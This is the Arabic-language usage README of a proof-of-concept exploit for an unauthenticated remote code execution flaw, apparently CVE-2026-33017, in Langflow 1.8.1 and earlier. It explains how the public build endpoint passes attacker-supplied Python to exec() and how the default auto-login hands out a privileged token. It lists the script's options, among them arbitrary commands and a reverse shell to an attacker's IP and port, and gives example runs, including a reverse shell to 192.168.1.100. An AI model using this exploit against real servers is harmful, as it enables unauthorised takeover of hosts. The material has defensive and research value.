
الثغرة في Langflow 1.8.1 والإصدارات الأقدم تسمح لمهاجم عن بُعد وغير مصادق عليه بتحقيق تنفيذ أوامر عشوائية على المضيف.
الثغرة الأمنية في Langflow 1.8.1 والإصدارات الأقدم تسمح لمهاجم عن بُعد وغير مُصادَق بتنفيذ أوامر عشوائية على المضيف.
تسمح نقطة النهاية POST /api/v1/build_public_tmp/{flow_id}/flow لأي شخص ببناء تدفقات عامة دون مصادقة.
من خلال توفير معامل البيانات الاختياري، يمكن للمهاجم تجاوز التدفق المخزّن بتعريفه المخصص، مع تضمين كود Python عشوائي داخل إعدادات العقد. يتم تنفيذ هذا الكود الذي يتحكم فيه المستخدم عبر exec() دون أي عزل أو تحقق، مما يؤدي إلى تنفيذ كود عن بُعد دون مصادقة.
Langflow 1.8.1 والإصدارات الأقدم
AUTO_LOGIN=trueعندما يكون AUTO_LOGIN=true (الإعداد الافتراضي)، يمكن لمهاجم غير مُصادَق تلبية جميع الشروط:
GET /api/v1/auto_login ← الحصول على رمز مستخدم متميزPOST /api/v1/flows/ ← إنشاء تدفق عامbuild_public_tmp دون أي مصادقةpython cve-2026-33017.py <host> [options]
الخيارات:
-p PORT, --port PORT: منفذ SSH (الافتراضي: 7860)
-id FLOW_ID, --flow_id FLOW_ID: معرف التدفق العام (سيتم إنشاء معرف جديد إذا تم حذفه)
-c COMMAND, --command COMMAND: أمر مخصص للتنفيذ
--shell: تشغيل شل عكسي
--lhost LHOST: عنوان IP للمهاجم للشل العكسي
--lport LPORT: منفذ المهاجم للشل العكسي (الافتراضي: 4444)
-t TIMEOUT, --timeout TIMEOUT: مهلة الاتصال بالثواني (الافتراضي: 5)
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
هذا الـ PoC مخصص لأغراض تعليمية وبحثية فقط. استخدمه على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج.